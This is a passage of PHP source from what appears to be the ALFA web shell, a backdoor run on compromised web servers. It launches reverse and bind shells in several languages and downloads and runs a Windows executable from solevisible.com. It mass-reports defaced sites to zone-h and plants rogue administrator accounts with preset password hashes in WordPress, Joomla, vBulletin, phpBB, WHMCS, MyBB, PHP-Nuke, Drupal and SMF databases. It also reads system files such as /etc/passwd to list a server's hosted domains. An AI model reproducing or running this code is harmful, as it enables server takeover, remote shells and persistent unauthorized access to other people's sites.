\";\nif(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){\n$lang = $_POST['alfa1'];\n$ip = $_POST['alfa2'];\n$port = $_POST['alfa3'];\n$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);\n$tmpdir = ALFA_TEMPDIR;\n$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);\n$allow = array('perl','ruby','python','node');\neval('$lan=$'.$lang.';');\nif(in_array($lang,$allow)){\nif(__write_file($name,__get_resource($lan))){\nif(_alfa_can_runCommand(true,true)){\n$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';\n$out = alfaEx(\"$lang $name $arg $os\");\nif($out==''){$out=\"
[ Finished...! ]
\";}\necho(\"
{$out}
\");\n}\n}else{\necho(\"
[ Failed...! ]
\");\n}\n}\nif($lang=='java'||$lang=='c'){\n$code = __get_resource($lan);\n$out = nl2br(bcinit($lang, $code,'',''));\necho(\"
{$out}
\");\n}\nif($lang=='bcwin'){\n$alfa = new AlfaCURL();\n$s = $alfa->Send('http://solevisible.com/bc/windows.exe');\n$tmpdir = ALFA_TEMPDIR;\n$f = @fopen($tmpdir.'/bcwin.exe','w+');\n@fwrite($f, $s);\n@fclose($f);\n$out = alfaEx($tmpdir.\"/bcwin.exe \".$_POST['alfa2'].\" \".$_POST['alfa3']);\n}\nif($lang=='php'){\necho \"
\";\n$code = __get_resource($lan);\nif($code!==false){\n$code = \"\\$target = \\\"\".$arg.\"\\\";\\n\".$code;\neval($code);\necho(\"
[ Finished...! ]
\");\n}\necho \"
\";\n}\n}\necho \"
\";\nalfafooter();\n}\nfunction alfazoneh(){\nalfahead();\necho '
';\nif(!function_exists('curl_version')){\necho \"
PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK
\";\n}\n$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');\n$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');\necho '\n

| Zone-h Mass Poster |

\n
>\\'); return false;\">\n\n
\n

\n
\n
\n
';\nif($_POST['alfa5'] && $_POST['alfa5'] == '>>'){\nob_start();\n$hacker = $_POST['alfa1'];\n$method = $_POST['alfa2'];\n$neden = $_POST['alfa3'];\n$site = $_POST['alfa4'];\nif(empty($hacker)){\ndie (__pre().\"
[+] YOU MUST FILL THE ATTACKER NAME [+]
\");\n}elseif($method == \"------------------------------------SELECT-------------------------------------\"){\ndie(__pre().\"
[+] YOU MUST SELECT THE METHOD [+]
\");\n}elseif($neden == \"------------------------------------SELECT-------------------------------------\"){\ndie(__pre().\"
[+] YOU MUST SELECT THE REASON [+]
\");\n}elseif(empty($site)){\ndie(__pre().\"
[+] YOU MUST INTER THE SITES LIST [+]
\");\n}\n$i = 0;\n$sites = explode(\"\\n\", $site);\n$alfa = new AlfaCURL();\nwhile($i < count($sites)){\nif(substr($sites[$i], 0, 4) != \"http\"){\n$sites[$i] = \"http://\".$sites[$i];\n}\n$alfa->Send(\"http://www.zone-h.com/notify/single\",\"post\",\"defacer=\".$hacker.\"&domain1=\". $sites[$i].\"&hackmode=\".$method.\"&reason=\".$neden);\n++$i;\n}\necho __pre().\"
[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]
\";\n}\necho \"
\";\nalfafooter();\n}\nfunction alfapwchanger(){\nalfahead();\n\necho '

| Add New Admin |
\n
';\n$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));\nAlfa_Create_A_Tag('pwchanger',$vals);\necho '
';\nif(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){\n\necho __pre().'
| WordPress |
\n
'.getConfigHtml('wp').'
>\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;\" method=\"POST\">';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),\n 'td7' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),\n 'td8' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => '[email protected]', 'inputSize' => '50')\n);\ncreate_table($table);\necho '
';\nif ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){\n$localhost = $_POST['alfa3'];\n$database = $_POST['alfa4'];\n$username = $_POST['alfa5'];\n$password = $_POST['alfa6'];\n$admin = $_POST['alfa8'];\n$SQL = $_POST['alfa9'];\n$prefix = $_POST['alfa10'];\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"insert into \".$prefix.\"users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')\") or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"select ID from \".$prefix.\"users where user_login='\".$admin.\"'\") or die(mysqli_error($conn));\n$sole = @mysqli_num_rows($solevisible);\nif ($sole == 1){\n$solevis = @mysqli_fetch_assoc($solevisible);\n$res = $solevis['ID'];\n}\n$solevisible=@mysqli_query($conn,\"insert into \".$prefix.\"usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'\".$res.\"','first_name','solevisible'),(null,'\".$res.\"','last_name','solevisible'),(null,'\".$res.\"','nickname','solevisible'),(null,'\".$res.\"','description','solevisible'),(null,'\".$res.\"','rich_editing','true'),(null,'\".$res.\"','comment_shortcuts','false'),(null,'\".$res.\"','admin_color','fresh'),(null,'\".$res.\"','use_ssl','0'),(null,'\".$res.\"','show_admin_bar_front','true'),(null,'\".$res.\"','\".$prefix.\"capabilities','a:1:{s:13:\\\"administrator\\\";b:1;}'),(null,'\".$res.\"','\".$prefix.\"user_level','10'),(null,'\".$res.\"','show_welcome_panel','1'),(null,'\".$res.\"','\".$prefix.\"dashboard_quick_press_last_post_id','3')\") or die(mysqli_error($conn));\nif($solevisible){\n__alert('Success... '.$admin.' is created...');}\n}\n}\nif($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){\n\necho __pre().'
| Joomla |
'.getConfigHtml('joomla').'
>\\',\\'joomla\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;\" method=\"POST\">';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),\n 'td7' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),\n 'td8' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => '[email protected]', 'inputSize' => '50')\n);\ncreate_table($table);\necho '
';\nif ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){\n$localhost = $_POST['alfa3'];\n$database = $_POST['alfa4'];\n$username = $_POST['alfa5'];\n$password = $_POST['alfa6'];\n$admin = $_POST['alfa8'];\n$SQL = $_POST['alfa9'];\n$prefix = $_POST['alfa10'];\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"insert into \".$prefix.\"users (id,name,username,email,password) values(null,'Super User','\".$admin.\"','\".$SQL.\"','d4a590caacc0be55ef286e40a945ea45')\") or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"select id from \".$prefix.\"users where username='\".$admin.\"'\") or die(mysqli_error($conn));\n$sole =@mysqli_num_rows($solevisible);\nif ($sole == 1){\n$solevis =@mysqli_fetch_assoc($solevisible);\n$res = $solevis['id'];\n}\n$solevisible=@mysqli_query($conn,\"INSERT INTO \".$prefix.\"user_usergroup_map (user_id,group_id) VALUES ('\".$res.\"', '8')\") or die(mysqli_error($conn));\nif($solevisible){\n__alert('Success... '.$admin.' is created...');}\n}\n}\nif($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){\n\necho __pre().'
| vBulletin |
'.getConfigHtml('vb').'
>\\',this.localhost.value,this.database.value,\\'vb\\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;\" method=\"POST\">';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),\n 'td7' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),\n 'td8' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => '[email protected]', 'inputSize' => '50')\n);\ncreate_table($table);\necho '
';\nif($_POST['alfa1'] && $_POST['alfa1'] == '>>'){\n$localhost = $_POST['alfa2'];\n$database = $_POST['alfa3'];\n$username = $_POST['alfa5'];\n$password = $_POST['alfa6'];\n$prefix = $_POST['alfa7'];\n$admin = $_POST['alfa8'];\n$SQL = $_POST['alfa9'];\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_connect_error());\n$pw_col = @mysqli_connect(\"SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'\");\n$pw_col = @mysqli_num_rows($pw_col);\n$adm_perm = \"16744444\";\nif($pw_col > 0){\n$solevisible=@mysqli_query($conn,\"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*','$SQL','\".date('Y-m-d').\"','\".time().\"','blowfish:10','1984-05-20')\") or die(mysqli_error($conn));\n}\n$solevisible=@mysqli_query($conn,\"select userid from {$prefix}user where username='\".$admin.\"'\") or die(mysqli_error($conn));\n$sole = mysqli_num_rows($solevisible);\nif($sole == 1){\n$solevis = mysqli_fetch_assoc($solevisible);\n$res = $solevis['userid'];\n}\n$solevisible=@mysqli_query($conn,\"insert into {$prefix}administrator (userid,adminpermissions) values('\".$res.\"','\".$adm_perm.\"')\") or die(mysqli_error($conn));\nif($solevisible){\n__alert('Success... '.$admin.' is created...');}\n}\n}\nif(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){\n\necho __pre().'
| phpBB |
'.getConfigHtml('phpbb').'
>\\',this.localhost.value,this.database.value,this.username.value,\\'phpbb\\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;\" method=\"POST\">';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),\n 'td7' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),\n 'td8' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => '[email protected]', 'inputSize' => '50')\n);\ncreate_table($table);\necho '
';\nif ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){\n$localhost = $_POST['alfa2'];\n$database = $_POST['alfa3'];\n$username = $_POST['alfa4'];\n$password = $_POST['alfa6'];\n$admin = $_POST['alfa8'];\n$SQL = $_POST['alfa9'];\n$prefix = $_POST['alfa10'];\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\n$hash = md5('solevisible');\n$solevisible=@mysqli_query($conn,\"UPDATE \".$prefix.\"users SET username_clean ='\".$admin.\"' WHERE username_clean = 'admin'\") or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"UPDATE \".$prefix.\"users SET user_password ='\".$hash.\"' WHERE username_clean = 'admin'\") or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"UPDATE \".$prefix.\"users SET username_clean ='\".$admin.\"' WHERE user_type = 3\") or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"UPDATE \".$prefix.\"users SET user_password ='\".$hash.\"' WHERE user_type = 3\") or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"UPDATE \".$prefix.\"users SET user_email ='\".$SQL.\"' WHERE username_clean = 'admin'\") or die(mysqli_error($conn));\nif($solevisible){\n__alert('Success... '.$admin.' is created...');\n}\n}\n}\nif(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){\n\necho __pre().'
| Whmcs |
'.getConfigHtml('whmcs').'
>\\',this.localhost.value,this.database.value,this.username.value,this.password.value,\\'whmcs\\',null,this.admin.value,this.email.value); return false;\" method=\"POST\">';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),\n 'td7' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),\n 'td8' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => '[email protected]', 'inputSize' => '50')\n);\ncreate_table($table);\necho '
';\nif ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){\n$localhost = $_POST['alfa2'];\n$database = $_POST['alfa3'];\n$username = $_POST['alfa4'];\n$password = $_POST['alfa5'];\n$admin = $_POST['alfa8'];\n$SQL = $_POST['alfa9'];\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','\".$admin.\"','d4a590caacc0be55ef286e40a945ea45','\".$SQL.\"','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')\") or die(mysqli_error($conn));\nif($solevisible){\n__alert('Success... '.$admin.' is created...');}\n}\n}\nif(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){\n\necho __pre().'
| Mybb |
'.getConfigHtml('mybb').'
>\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\\'mybb\\',this.admin.value,this.email.value,this.prefix.value); return false;\" method=\"POST\">';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),\n 'td7' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),\n 'td8' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => '[email protected]', 'inputSize' => '50')\n);\ncreate_table($table);\necho '
';\nif ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){\n$localhost = $_POST['alfa2'];\n$database = $_POST['alfa3'];\n$username = $_POST['alfa4'];\n$password = $_POST['alfa5'];\n$admin = $_POST['alfa8'];\n$SQL = $_POST['alfa9'];\n$prefix = $_POST['alfa10'];\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"insert into \".$prefix.\"users (uid,username,password,salt,email,usergroup) values(null,'\".$admin.\"','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','\".$SQL.\"','4')\") or die(mysqli_error($conn));\nif($solevisible){\n__alert('Success... '.$admin.' is created...');}\n}\n}\nif(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){\n\necho __pre().'
| PhpNuke |
'.getConfigHtml('phpnuke').'
>\\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\\'nuke\\',this.email.value,this.prefix.value); return false;\" method=\"POST\">';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),\n 'td7' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),\n 'td8' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => '[email protected]', 'inputSize' => '50')\n);\ncreate_table($table);\necho '
';\nif ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){\n$localhost = $_POST['alfa2'];\n$database = $_POST['alfa3'];\n$username = $_POST['alfa4'];\n$password = $_POST['alfa5'];\n$admin = $_POST['alfa7'];\n$SQL = $_POST['alfa9'];\n$prefix = $_POST['alfa10'];\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\n$hash = md5($pwd);\n$solevisible=@mysqli_query($conn,\"insert into \".$prefix.\"_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')\") or die(mysqli_error($conn));\nif($solevisible){\n__alert('Success... '.$admin.' is created...');}\n}\n}\nif(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){\n\necho __pre().'
| Drupal |
'.getConfigHtml('drupal').'
>\\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\\'drupal\\'); return false;\" method=\"POST\">';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),\n 'td7' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)\n );\ncreate_table($table);\necho '
';\nif ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){\n$localhost = $_POST['alfa2'];\n$database = $_POST['alfa4'];\n$username = $_POST['alfa5'];\n$password = $_POST['alfa6'];\n$admin = $_POST['alfa8'];\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\n$getDescuid = @mysqli_query($conn,\"select uid from users order by uid desc limit 0,1\");\n$getDescuid = @mysqli_fetch_assoc($getDescuid);\n$getDescuid = $getDescuid['uid'];\n$getdescuid = $getDescuid++;\n$solevisible=@mysqli_query($conn,\"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\\$S\\$DP2y9AbolCBOd\\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','[email protected]','filtered_html','1','Europe/Berlin','[email protected]')\") or die(mysqli_error($conn));\n$solevisible=@mysqli_query($conn,\"select uid from users where name='\".$admin.\"'\") or die(mysqli_error($conn));\n$sole = mysqli_num_rows($solevisible);\nif ($sole == 1){\n$solevis = mysqli_fetch_assoc($solevisible);\n$res = $solevis['uid'];\n}\n$solevisible=@mysqli_query($conn,\"INSERT INTO users_roles (uid,rid) VALUES ('\".$res.\"', '3')\") or die(mysqli_error($conn));\nif($solevisible){\n__alert('Success... '.$admin.' is created...');}\n}\n}\n\nif(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){\n\necho __pre().'
| SMF |
'.getConfigHtml('smf').'
>\\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\\'smf\\'); return false;\" method=\"POST\">';\n$table = array('td1' =>\n array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),\n 'td2' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),\n 'td3' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),\n 'td4' =>\n array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),\n 'td5' =>\n array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),\n 'td6' =>\n array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),\n 'td7' =>\n array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),\n );\ncreate_table($table);\necho '
';\nif ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){\n$localhost = $_POST['alfa2'];\n$database = $_POST['alfa3'];\n$username = $_POST['alfa5'];\n$password = $_POST['alfa6'];\n$prefix = $_POST['alfa7'];\n$admin = $_POST['alfa8'];\n$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));\n$setpwAlg = sha1(strtolower($admin) . 'solevisible');\n$solevisible=@mysqli_query($conn,\"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','[email protected]')\") or die(mysqli_error($conn));\nif($solevisible){\n__alert('Success... '.$admin.' is created...');}\n}\n}\necho \"
\";\nalfafooter();\n}\nfunction alfaMakePwd(){\n\tif(_alfa_file_exists(\"/etc/virtual/domainowners\")||(_alfa_file_exists(\"/etc/named.conf\")&&_alfa_file_exists(\"/etc/valiases\"))){\n\t\treturn \"/home/{user}/public_html/\";\n\t}\n\t$document = explode(\"/\", $_SERVER[\"DOCUMENT_ROOT\"]);\n\t$public = end($document);\n\tarray_pop($document);\n\tarray_pop($document);\n\t$path = implode(\"/\", $document) . \"/{user}/\" . $public;\n\treturn $path;\n}\nfunction alfaGetDomains($state = false){\n\t$state = \"named.conf\";\n\t$lines = array();\n\t$lines = _alfa_file('/etc/named.conf');\n\tif(!$lines){\n\t\t$lines = @scandir(\"/etc/valiases/\");\n\t\t$state = \"valiases\";\n\t\tif(!$lines){\n\t\t\t$lines = @scandir(\"/var/named\");\n\t\t\t$state = \"named\";\n\t\t\tif(!$lines && $state){\n\t\t\t\t$lines = _alfa_file('/etc/passwd');\n\t\t\t\t$state = \"passwd\";\n\t\t\t}\n\t\t}\n\t}\n\treturn array(\"lines\" => $lines, \"state\" => $state);\n}\nfunction alfaCreateParentFolder(){\n\t$parent = $GLOBALS['home_cwd'] . \"/\" . __ALFA_DATA_FOLDER__;\n\tif(!@is_dir($parent)){\n\t\t@mkdir($parent, 0755, true);\n\t}\n}\nfunction alfasymlink(){\nalfahead();\nAlfaNum(9,10);\nalfaCreateParentFolder();\n@chdir($GLOBALS['home_cwd'] . \"/\" 